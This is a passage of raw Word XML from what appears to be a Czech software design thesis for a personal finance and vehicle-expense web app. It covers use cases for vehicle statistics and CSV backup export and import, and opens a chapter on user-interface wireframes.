        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel ve formuláři vybere časové období, pro které chce statistiky zobrazit a formulář odešle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962CD2" w:rsidRPr="00EA15C6" w:rsidRDefault="00962CD2" w:rsidP="00500D6F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje graf vývoje ceny pohonných hmot a kilometrového nájezdu vozidla dle evidovaných tankování. Dále zobrazí průměrnou spotřebu vozidla</w:t>
      </w:r>
      <w:r w:rsidR="00E00D08">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> průměrnou cenu za kilometr, celkovou cenu pohonných hmot, cenu dalších nákladů (transakce označené štítkem vozidla) za vybrané období a graf průměrné spotřeby mezi jednotlivým tankováním do plné nádrže.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962CD2" w:rsidRPr="00962CD2" w:rsidRDefault="00962CD2" w:rsidP="00962CD2">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Pokud uživatel nezaznamenal alespoň dvě tankování do plné nádrže ve vybraném období, tak systém </w:t>
      </w:r>
      <w:r w:rsidR="005508A8">
        <w:t>ne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zobrazí </w:t>
      </w:r>
      <w:r w:rsidR="005508A8">
        <w:t>údaje týkající se kilometrového nájezdu vozidla, průměrné spotřeby vozidla a nákladů na kilometr.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3146" w:rsidRPr="004C3146" w:rsidRDefault="004C3146" w:rsidP="004C3146">
      <w:r>
        <w:t>Uživateli jsou zobrazeny dostupné statistiky o vozidle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C06F82" w:rsidRDefault="00C06F82">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2DF2" w:rsidRDefault="00C46CA1" w:rsidP="000B2DF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc387327859"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Zálohování a obnova </w:t>
      </w:r>
      <w:r w:rsidR="000B2DF2">
        <w:t>dat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidR="000B2DF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRPr="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:r>
        <w:t>V této podkapitole jsou popsány scénáře, které se týkají zálohování a obnovy dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2DF2" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UC32: </w:t>
      </w:r>
      <w:r w:rsidR="000B2DF2">
        <w:t>Exportování dat do CSV souboru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRPr="002F5FD7" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:r>
        <w:t>UC umožňuje zálohovat uživatelská data do CSV souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRPr="008F1CD3" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRPr="00173253" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00500D6F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost exportování dat do CSV souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00500D6F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje CSV soubor obsahující všechna data uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5947" w:rsidRPr="00EA15C6" w:rsidRDefault="002D5947" w:rsidP="00500D6F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel si uloží vygenerovaný soubor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5947" w:rsidRPr="002D5947" w:rsidRDefault="002D5947" w:rsidP="002D5947">
      <w:r>
        <w:t>Uživatel má uložený soubor se zálohou svých dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2DF2" w:rsidRDefault="00C06F82" w:rsidP="004954AE">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC33: </w:t>
      </w:r>
      <w:r w:rsidR="000B2DF2">
        <w:t>Importování dat z CSV souboru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRPr="002F5FD7" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:r>
        <w:t xml:space="preserve">UC </w:t>
      </w:r>
      <w:r w:rsidR="002D5947">
        <w:t>umožňuje uživateli obnovit zálohovaná uživatelská data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRPr="008F1CD3" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRPr="00173253" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="002D5947" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost importování dat z CSV souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5947" w:rsidRDefault="002D5947" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5947" w:rsidRDefault="002D5947" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel pomocí formuláře odešle CSV soubor s daty na server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5947" w:rsidRPr="00EA15C6" w:rsidRDefault="002D5947" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém ověří kompatibilitu souboru a provede import dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5947" w:rsidRPr="002D5947" w:rsidRDefault="002D5947" w:rsidP="002D5947">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel odeslal poškozený nebo nekompatibilní soubor, je na tuto skutečnost upozorněn a UC pokračuje krokem 3 základního scénáře.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C46CA1" w:rsidRDefault="00C46CA1" w:rsidP="00C46CA1">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2DF2" w:rsidRPr="00CD49DD" w:rsidRDefault="00157898" w:rsidP="00CD49DD">
      <w:r>
        <w:t>V systému jsou uložena data z CSV souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4761" w:rsidRDefault="00BF4761" w:rsidP="00BF4761">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc387327860"/>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Uživatelské rozhraní</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w:rsidR="00BF4761" w:rsidRDefault="00BF4761" w:rsidP="00704255">
      <w:r>
        <w:t>Po specifikování funkčních požadavků kladených na aplikaci a jejich rozpracování do formy uživatelský</w:t>
      </w:r>
      <w:r w:rsidR="00900DFE">
        <w:t>ch scénářů v předchozí kapitole,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bude tato kapitola </w:t>
      </w:r>
      <w:r w:rsidR="00900DFE">
        <w:t>věnována</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> návrh</w:t>
      </w:r>
      <w:r w:rsidR="00900DFE">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uživatelského rozhraní aplikace.</w:t>
      </w:r>
      <w:r w:rsidR="00900DFE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="009E3E88" w:rsidP="00900DFE">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5328048" cy="7213600"/>
            <wp:effectExtent l="19050" t="0" r="5952" b="0"/>
            <wp:docPr id="10" name="Obrázek 9" descr="sche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ma.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5332060" cy="7219031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="00900DFE" w:rsidP="00900DFE">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Ref385183310"/>
      <w:bookmarkStart w:id="148" w:name="_Toc387327915"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="147"/>
      <w:r>
        <w:t>. Schéma propojení jednotlivých stránek uživatelského rozhraní.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w:rsidR="004E2CCC" w:rsidRDefault="004E2CCC" w:rsidP="004E2CCC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Na </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref385183310 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je znázorněno schéma propojení jednotlivých stránek</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve"> webové</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aplikace. Výchozím bodem je veřejná úvodní stránka, ze které se uživatel po přihlášení přesune do chráněné sekce</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve">. Z každé stránky v chráněné sekci se uživatel bude moci odhlásit. Chráněná sekce je rozdělena na tři hlavní části – </w:t>
      </w:r>
      <w:r w:rsidR="002226FB" w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002226FB" w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Správ</w:t>
      </w:r>
      <w:r w:rsidR="00216F1C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="002226FB" w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Vozidla</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t>. Uživatel bude moci kdykoliv přejít z jedné části do druhé pomocí hlavního menu</w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t xml:space="preserve"> nebo</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve"> křížových odkazů, které se v </w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t>jednotlivých</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve"> částech vyskytují.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00475CA7" w:rsidRPr="004E2CCC" w:rsidRDefault="00475CA7" w:rsidP="004E2CCC">
      <w:r>
        <w:t>V této kapitole budou dále prezentovány náčrty některých důležitých stránek aplikace. Všechny náčrty uživatelského rozhraní byly vytvořeny v open-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aplikaci </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pencil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002057FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13469142"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION cuy9UcOo3YOpPgsE \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[16]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00907DBA">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="002171EE">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00907DBA">
        <w:t>při</w:t>
      </w:r>
      <w:r w:rsidR="003B5690">
        <w:t xml:space="preserve"> jejich vytváření byl</w:t>
      </w:r>
      <w:r w:rsidR="00907DBA">
        <w:t xml:space="preserve"> brán ohled na doporučení v knihách </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00907DBA">
        <w:t>Webdesign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B5690">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00907DBA">
        <w:t xml:space="preserve">Nenuťte uživatele přemýšlet </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13469263"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION deVAJcbTgKKOs1K9 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00907DBA">
        <w:t xml:space="preserve"> a Použitelnost webových stránek </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13469295"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION a5Pt1zMYdT2B05j4 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[17]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00907DBA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E2CCC" w:rsidRDefault="004E2CCC" w:rsidP="004E2CCC">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Ref386983853"/>
      <w:bookmarkStart w:id="150" w:name="_Ref386983859"/>
      <w:bookmarkStart w:id="151" w:name="_Toc387327861"/>
      <w:r>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t xml:space="preserve"> a evidence transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w:rsidR="004E2CCC" w:rsidRDefault="002171EE" w:rsidP="004E2CCC">
      <w:r>
        <w:t xml:space="preserve">Stránka </w:t>
      </w:r>
      <w:r w:rsidR="004E2CCC" w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r w:rsidR="004E2CCC">
        <w:t xml:space="preserve"> je hlavní </w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve">stránkou chráněné sekce </w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t>aplikace</w:t>
      </w:r>
      <w:r w:rsidR="002226FB">
        <w:t xml:space="preserve"> a slouží ke správě transakcí a zobrazení statistik.</w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t xml:space="preserve"> Jednou z nejdůležitějších funkcí aplika</w:t>
      </w:r>
      <w:r>
        <w:t>ce je evidence transakcí,</w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t xml:space="preserve">ávrh </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">formuláře pro </w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t xml:space="preserve">zadávání nového výdaje je na </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000A7A88">
        <w:instrText xml:space="preserve"> REF _Ref385188844 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000A7A88">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00475CA7">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00475CA7" w:rsidRDefault="00475CA7" w:rsidP="00475CA7">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4135234" cy="4285095"/>
            <wp:effectExtent l="19050" t="19050" r="17666" b="20205"/>
            <wp:docPr id="21" name="Obrázek 13" descr="nov_vd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v_vdaj.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24" cstate="print"/>
                    <a:srcRect r="54290"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4138183" cy="4288151"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00475CA7" w:rsidRPr="004E2CCC" w:rsidRDefault="00475CA7" w:rsidP="00475CA7">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Ref385188844"/>
      <w:bookmarkStart w:id="153" w:name="_Toc387327916"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="152"/>
      <w:r>
        <w:t>. Náčrt formuláře pro vytvoření nového výdaje.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w:rsidR="002226FB" w:rsidRDefault="000A7A88" w:rsidP="002226FB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="6609080"/>
            <wp:effectExtent l="38100" t="19050" r="20320" b="20320"/>
            <wp:docPr id="22" name="Obrázek 21" descr="preh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hled.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="6609080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="002226FB" w:rsidP="002226FB">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Ref385188725"/>
      <w:bookmarkStart w:id="155" w:name="_Toc387327917"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="154"/>
      <w:r>
        <w:t xml:space="preserve">. Náčrt </w:t>
      </w:r>
      <w:r w:rsidR="00531197">
        <w:t xml:space="preserve">stránky </w:t>
      </w:r>
      <w:r>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r w:rsidR="00531197">
        <w:t xml:space="preserve"> zobrazené na monitoru s vysokým rozlišením</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w:rsidR="006837E8" w:rsidRDefault="000A7A88" w:rsidP="000A7A88">
      <w:r>
        <w:t xml:space="preserve">Na </w:t>
      </w:r>
